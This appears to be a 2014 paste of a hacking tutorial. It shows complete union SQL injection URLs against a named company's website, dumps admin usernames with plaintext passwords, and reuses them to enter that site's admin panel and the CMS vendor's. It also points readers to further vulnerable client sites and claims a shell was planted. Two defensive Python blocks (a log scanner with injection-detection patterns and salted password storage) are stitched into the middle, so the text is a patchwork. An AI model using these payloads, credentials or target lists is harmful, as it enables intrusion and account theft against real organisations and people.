a guest
Oct 2nd, 2014
../password_reuse_multi-pwn_like_an_old_school_hacker

/bit/and/cheese

~/today i'll walk u through an epitome of password reuse - and how we pwn several sites with simple vulns_ anatomy of this tutorial is simple:_

= using only w3m + wget - because im old school & fucking cool
= union injection
= exploit password reuse

$ first we got a target

wget -S --spider "http://whitearrowlogistics.com/storage.asp?id=19\'"

HTTP request sent, awaiting response...
HTTP/1.1 500 Internal Server Error <<< status code is true
Date: [n/a]
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET

$ now we use w3m to confirm

w3m -dump "http://whitearrowlogistics.com/storage.asp?id=19\'"|grep 'error'|less

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver]

$ vulnerable - mysql - so we need to find the version_ most MySQL version strings have 'community' in them - so we gonna grep for this (since the output was cluttered - we're gonna mark the output with square brackets = 0x5b 0x5d)

w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x5b,@@version,0x5b,0x2e%29,null,null--'|grep community|less

$ next we seek the current db

w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x2e,0x5b,database(),0x5d,0x2e%29,null,null--'|grep 'db'|less

$ now we dump the username and password

w3m -dump http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,%28select%20concat%280x7174696a71,ifnull%28cast%28password%20as%20char%29,0x3c62722f3e20%29,0x66727378756d,ifnull%28cast%28username%20as%20char%29,0x3c62722f3e20%29,0x716c627571%29%20from%20whitearrowdb.admin_users%20limit%202,1%29,null,null--|less
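Every one of the union probes above goes into the web server's access log verbatim, which is what a defender should be watching for. The scanner below is an added example (my code, not part of the paste) for IIS-style W3C extended logs: it URL-decodes each query string, including double-encoded ones, and flags the indicators the walkthrough relies on, namely union ... select, a boolean tautology like "and 1=2", @@version, hex literals inside concat(), a trailing comment terminator, and a stray quote on a numeric parameter. The log lines are constructed and the client addresses are documentation ranges, not real hosts.

```python
"""
Flag union-based SQL injection probes in IIS-style (W3C extended) access logs.
Added defensive example; the log sample is constructed, not a real capture.
"""
import re
from urllib.parse import unquote_plus

# Constructed W3C extended log. Field order is declared by the #Fields: header.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2014-10-02 10:00:01 10.0.0.5 GET /storage.asp id=19 203.0.113.7 200
2014-10-02 10:00:03 10.0.0.5 GET /storage.asp id=19' 203.0.113.7 500
2014-10-02 10:00:09 10.0.0.5 GET /storage.asp id=-19%20and%201=2%20union%20all%20select%20null,null,concat%280x5b,@@version,0x5d%29,null-- 203.0.113.7 200
2014-10-02 10:00:15 10.0.0.5 GET /webdesigners.asp id=6 198.51.100.9 200
2014-10-02 10:00:20 10.0.0.5 GET /storage.asp id=%2D19%2520union%2520select%2520null 203.0.113.7 200
"""

# Each indicator is evaluated against the fully decoded query string.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "boolean_tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "hex_literal_in_concat": re.compile(r"concat\s*\(\s*0x[0-9a-f]+", re.I),
    "comment_terminator": re.compile(r"--\s*$|#\s*$|/\*"),
    "quote_in_numeric_param": re.compile(r"=\s*-?\d+'(?:$|&)"),
}


def fully_decode(s, max_rounds=3):
    """URL-decode repeatedly so a double-encoded %2520 still collapses to a space."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_w3c(log_text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields: names."""
    fields = None
    rows = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        # cs-uri-query is logged URL-encoded, so a plain space split is safe.
        parts = line.split(" ", len(fields) - 1)
        if len(parts) == len(fields):
            rows.append(dict(zip(fields, parts)))
    return rows


def scan(log_text):
    """Return one hit per request whose decoded query matches at least one indicator."""
    hits = []
    for row in parse_w3c(log_text):
        query = fully_decode(row.get("cs-uri-query", ""))
        matched = sorted(name for name, rx in INDICATORS.items() if rx.search(query))
        if matched:
            hits.append({
                "client": row["c-ip"],
                "stem": row["cs-uri-stem"],
                "status": row["sc-status"],
                "indicators": matched,
                "query": query,
            })
    return hits


def hits_by_client(hits):
    """Count flagged requests per source address; repeated probes stand out."""
    counts = {}
    for h in hits:
        counts[h["client"]] = counts.get(h["client"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["client"], h["status"], h["stem"], ",".join(h["indicators"]))
    print(hits_by_client(found))
```

Note that the probe that returns 200 is the dangerous one: the 500 from the bare quote is only reconnaissance, while a 200 on a union payload means the query actually executed, so an alert rule should weight union_select plus a 200 status above the error-only hits.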
  40.  
$ voila!_

user    pass

nigel   neubiberg1
ken     na691500a
mark    whitearrow682424

$ these blokes used strong pass - too bad they were in plain text!_ time to search for login page
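That table is the whole lesson in one screen: passwords that look strong, stored in the clear, and (as the rest of the paste shows) reused on the CMS vendor's own admin panel. The code below is an added example of how an admin_users table should hold them; it is my code, not anything from the paste or from any CMS it names, and the usernames and passwords in it are constructed. Each record is a salted, iterated PBKDF2-SHA256 hash, so a dump of the table yields nothing directly reusable, and the same password registered on two different sites produces two unrelated records.

```python
"""
Salted, iterated password storage for an admin_users table.
Added defensive example; all credentials below are constructed placeholders.
"""
import base64
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000   # work factor; raise it over time as hardware gets faster
SALT_BYTES = 16


def hash_password(password, iterations=ITERATIONS):
    """Return a self-describing record: algorithm$iterations$salt$hash (salt and hash base64)."""
    salt = os.urandom(SALT_BYTES)              # fresh random salt per record
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([
        ALGORITHM,
        str(iterations),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    ])


def verify_password(password, record):
    """Recompute the hash with the record's own salt and iterations; compare in constant time."""
    try:
        alg, iters, salt_b64, dk_b64 = record.split("$")
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(dk_b64)
        iterations = int(iters)
    except (ValueError, TypeError):
        return False
    if alg != ALGORITHM or iterations < 1:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected)


# Used when the username does not exist, so a lookup failure costs the same
# time as a wrong password and does not reveal which usernames are valid.
_DUMMY_RECORD = hash_password("not-a-real-password")


class AdminUsers:
    """Minimal stand-in for an admin_users table that never keeps the clear-text password."""

    def __init__(self):
        self._rows = {}

    def add(self, username, password):
        self._rows[username] = hash_password(password)

    def login(self, username, password):
        record = self._rows.get(username)
        if record is None:
            verify_password(password, _DUMMY_RECORD)   # equalise timing, then refuse
            return False
        return verify_password(password, record)

    def dump(self):
        """What someone who read the whole table would get: salted hashes, no secrets."""
        return dict(self._rows)


if __name__ == "__main__":
    store = AdminUsers()
    store.add("alice", "correct horse battery staple")   # constructed credentials
    print(store.login("alice", "correct horse battery staple"))   # True
    print(store.login("alice", "wrong"))                          # False
    print(store.dump()["alice"])
```

With this in place the paste's third step still returns rows, but the rows are per-site salted hashes: they cannot be typed into another site's login form, and matching the same password across two dumps would require cracking both independently.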
  50.  
wget -S --spider http://www.whitearrowlogistics.com/login/

wget -S --spider http://www.whitearrowlogistics.com/admin/

$ got lucky on 2nd try_ let's login..._ with w3m (love the jap for this)

w3m http://www.whitearrowlogistics.com/admin/

$ magic!_ now we notice a line at the bottom of the admin page said >> Please contact sales@e-cc.org 'blah blah' << it means we have found the CMS dev_ let's see if we can pwn it too - find admin page

wget -S --spider http://www.whitearrowlogistics.com/admin/

$ same page as the last target - let's try to login with the user/pass we have

w3m http://www.whitearrowlogistics.com/admin/

$ w00t!_ same pass & usr!

$$

$ let's recon the site with Bing search using site:

w3m -dump 'http://www.bing.com/search?q=site:e-cc.org+asp?id=&go=&filt=all&first=1'|less

$ first search result said >> www.e-cc.org/webdesigners.asp?id=6 << let's check if this is vuln too

wget -S --spider www.e-cc.org/webdesigners.asp?id=6

$$ it gave a 500_ response said ADODB.Command error '800a0d5d' - in fact - almost all of their clients' websites have some kind of database errors_ i'll leave this here for you guys to pick up_

$ i already shelled the site - so see that as an easter egg ;-)